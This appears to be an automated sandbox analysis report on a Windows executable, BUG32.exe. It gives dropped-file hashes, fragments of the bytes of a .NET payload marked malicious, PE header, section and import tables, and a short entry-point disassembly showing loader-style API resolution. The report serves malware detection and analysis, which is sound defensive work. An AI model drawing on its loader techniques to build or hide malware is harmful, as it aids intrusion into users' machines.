                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.422109285937966
                          Encrypted:false
                          SSDEEP:6144:WSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNp0uhiTw:1vloTMW+EZMM6DFyj03w
                          MD5:567E227286F5A3B5EC9484438E6DC7A7
                          SHA1:97C7E5E5C04AB81AEA99CA1C34DAA8C6676CFBBA
                          SHA-256:545CC5AF72E3774388CA076C4E68AFD44BFC43F3D1A0820CD7C063215E30C38D
                          SHA-512:668746A2E1E140446DEDBC87B5DCED1707F54F0F307B2713508F40ACC10D20627B729790AFBF84FFBE7CD98783F12B3203989696C206831E8CE2D25B9083287B
                          Malicious:false
                          Reputation:unknown
                          Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.252605261521246
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                          • Win32 Executable (generic) a (10002005/4) 49.93%
                          • Windows Screen Saver (13104/52) 0.07%
                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:BUG32.exe
                          File size:3'209'216 bytes
                          MD5:88de5895931431e3bdd22badc8a5bf01
                          SHA1:b950579884065095fc5a43a3d3c31533fbf2332a
                          SHA256:61350356b1968566fb172eb27ac18c916465c585df84c4d70ec5ef4e4fa00f9a
                          SHA512:1252c5aa9c30ddc3e19fd61fa7a4b8d7d30b81e37bb9a15f063120cbdd8d373941f6977cec3e67ccaeab5e626a7caf89030e02dbdffa9a9fee5c0512284a335e
                          SSDEEP:49152:Zr2U5IahDUGN97rkqOAackLjQ0rZEAh3oA6wHE+K60Kk0aCLkfAZKt0OJTc:ZH2ahFNNrg3QbQoA6wHEnFN4IJ
                          TLSH:B6E501C3E1419AA0C8154E764C266D9903773E9BEF866B2B3044FA6674F3183AB757C3
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)W...............2....../.......0...........@..........................@1............................................
                          Icon Hash:0c1b890f1b6563f2
                          Entrypoint:0x70f000
                          Entrypoint Section:)Gu
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:
                          Time Stamp:0x5729A4FD [Wed May 4 07:30:05 2016 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:d7ee0bec939bda9b20c9cb9dcb985e30
                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 0000016Ch
                          xor eax, eax
                          push ebx
                          push esi
                          push edi
                          mov dword ptr [ebp-24h], eax
                          mov dword ptr [ebp-10h], eax
                          mov dword ptr [ebp-14h], eax
                          mov dword ptr [ebp-08h], eax
                          mov dword ptr [ebp-0Ch], eax
                          mov dword ptr [ebp-20h], eax
                          mov dword ptr [ebp-18h], eax
                          mov dword ptr [ebp-48h], 57454A61h
                          mov dword ptr [ebp-44h], 652E7447h
                          mov dword ptr [ebp-40h], 00006578h
                          mov dword ptr [ebp-3Ch], 00000000h
                          call 00007F82FD4B86C5h
                          pop eax
                          add eax, 00000225h
                          mov dword ptr [ebp-04h], eax
                          mov eax, dword ptr fs:[00000030h]
                          mov dword ptr [ebp-28h], eax
                          mov eax, dword ptr [ebp-04h]
                          mov dword ptr [eax], E904C483h
                          mov eax, dword ptr [ebp-04h]
                          mov dword ptr [eax+04h], FFCF1D8Fh
                          mov eax, dword ptr [ebp-28h]
                          mov eax, dword ptr [eax+0Ch]
                          mov eax, dword ptr [eax+1Ch]
                          mov eax, dword ptr [eax]
                          mov eax, dword ptr [eax+08h]
                          mov ecx, dword ptr [eax+3Ch]
                          mov ecx, dword ptr [ecx+eax+78h]
                          add ecx, eax
                          mov edi, dword ptr [ecx+1Ch]
                          mov ebx, dword ptr [ecx+20h]
                          mov esi, dword ptr [ecx+24h]
                          mov ecx, dword ptr [ecx+18h]
                          add esi, eax
                          add edi, eax
                          add ebx, eax
                          xor edx, edx
                          mov dword ptr [ebp-30h], esi
                          mov dword ptr [ebp-1Ch], edx
                          mov dword ptr [ebp-34h], ecx
                          cmp edx, dword ptr [ebp-34h]
                          jnc 00007F82FD4B880Eh
                          movzx ecx, word ptr [esi+edx*2]
                          mov edx, dword ptr [ebx+edx*4]
                          mov esi, dword ptr [edi+ecx*4]
                          add edx, eax
                          mov ecx, dword ptr [edx]
                          add esi, eax
                          cmp ecx, 4D746547h
                          jne 00007F82FD4B8714h
                          cmp dword ptr [edx+04h], 6C75646Fh
                          jne 00007F82FD4B870Bh
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xf2640xc8.data
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2fd224.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0xf5b40x288.data
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .code0x10000x20c70x2200494ff811ab595efaec1a575a2c43cc17False0.42532169117647056data5.436442620942612IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .text0x40000x9c1a0x9e000c28d3ebfbb61b593d041a5b3bd2e932False0.5339695411392406data6.566799834552265IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0xe0000x97e0xa00facc1a97edd0b9fbad36add1494b300fFalse0.749609375data6.609369602267539IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0xf0000x17840x14001dd4e42d4fa3e61136779d0126dddb62False0.3935546875data4.795570791871384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x110000x2fd2240x2fd4002a7f249ab3c2e7f88a627e8d2ee9da0aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          )Gu0x30f0000x50000x420023d8204e4ff6db053ea980a5c9214581False0.7775213068181818data6.934623219704007IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0x112380x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.4959677419354839
                          RT_RCDATA0x115200x201Non-ISO extended-ASCII text, with very long lines (513), with no line terminators0.6471734892787524
                          RT_RCDATA0x117240xedata1.5714285714285714
                          RT_RCDATA0x117340x2fc6f1PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9314327239990234
                          RT_RCDATA0x30de280x13cNon-ISO extended-ASCII text, with very long lines (316), with no line terminators0.5791139240506329
                          RT_RCDATA0x30df640x8Non-ISO extended-ASCII text, with no line terminators2.0
                          RT_RCDATA0x30df6c0x6data2.3333333333333335
                          RT_GROUP_ICON0x30df740x14data1.15
                          RT_MANIFEST0x30df880x29cXML 1.0 document, ASCII text, with very long lines (668), with no line terminators0.5538922155688623
                          DLLImport
                          MSVCRT.dllmemset, strncmp, memmove, strncpy, strstr, _strnicmp, _stricmp, strlen, strcmp, sprintf, fabs, ceil, malloc, floor, free, fclose, memcpy, strcpy, tolower
                          KERNEL32.dllGetModuleHandleA, HeapCreate, RemoveDirectoryA, GetTempFileNameA, GetShortPathNameA, GetWindowsDirectoryA, GetSystemDirectoryA, HeapDestroy, ExitProcess, GetExitCodeProcess, GetNativeSystemInfo, FindResourceA, LoadResource, SizeofResource, HeapAlloc, HeapFree, Sleep, LoadLibraryA, GetProcAddress, FreeLibrary, GetCurrentThreadId, GetCurrentProcessId, CloseHandle, InitializeCriticalSection, GetCommandLineA, GetModuleFileNameA, GetEnvironmentVariableA, SetEnvironmentVariableA, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter, EnterCriticalSection, LeaveCriticalSection, GetVersionExA, HeapReAlloc, SetLastError, TlsAlloc, GetCurrentDirectoryA, SetCurrentDirectoryA, SetFileAttributesA, DeleteFileA, GetTempPathA, CreateDirectoryA, WriteFile, CreateFileA, SetFilePointer, ReadFile, DeleteCriticalSection
                          USER32.DLLCharLowerA, MessageBoxA, SendMessageA, PostMessageA, GetWindowThreadProcessId, IsWindowVisible, GetWindowLongA, GetForegroundWindow, IsWindowEnabled, EnableWindow, EnumWindows, SetWindowPos, DestroyWindow, GetDC, GetWindowTextLengthA, GetWindowTextA, SetRect, DrawTextA, GetSystemMetrics, ReleaseDC, GetSysColor, GetSysColorBrush, CreateWindowExA, CallWindowProcA, SetWindowLongA, SetFocus, RedrawWindow, RemovePropA, DefWindowProcA, SetPropA, GetParent, GetPropA, GetWindow, SetActiveWindow, UnregisterClassA, DestroyAcceleratorTable, LoadIconA, LoadCursorA, RegisterClassA, AdjustWindowRectEx, ShowWindow, CreateAcceleratorTableA, PeekMessageA, MsgWaitForMultipleObjects, GetMessageA, GetActiveWindow, TranslateAcceleratorA, TranslateMessage, DispatchMessageA, GetFocus, GetClientRect, FillRect, EnumChildWindows, DefFrameProcA, GetWindowRect, IsChild, GetClassNameA, GetKeyState, DestroyIcon, RegisterWindowMessageA
                          GDI32.DLLGetStockObject, SelectObject, SetBkColor, SetTextColor, GetTextExtentPoint32A, CreateSolidBrush, DeleteObject, GetObjectA, CreateCompatibleDC, GetDIBits, DeleteDC, GetObjectType, CreateDIBSection, BitBlt, CreateBitmap, SetPixel
                          COMCTL32.DLLInitCommonControlsEx
                          OLE32.DLLCoInitialize, CoTaskMemFree, RevokeDragDrop
                          SHELL32.DLLShellExecuteExA
                          WINMM.DLLtimeBeginPeriod
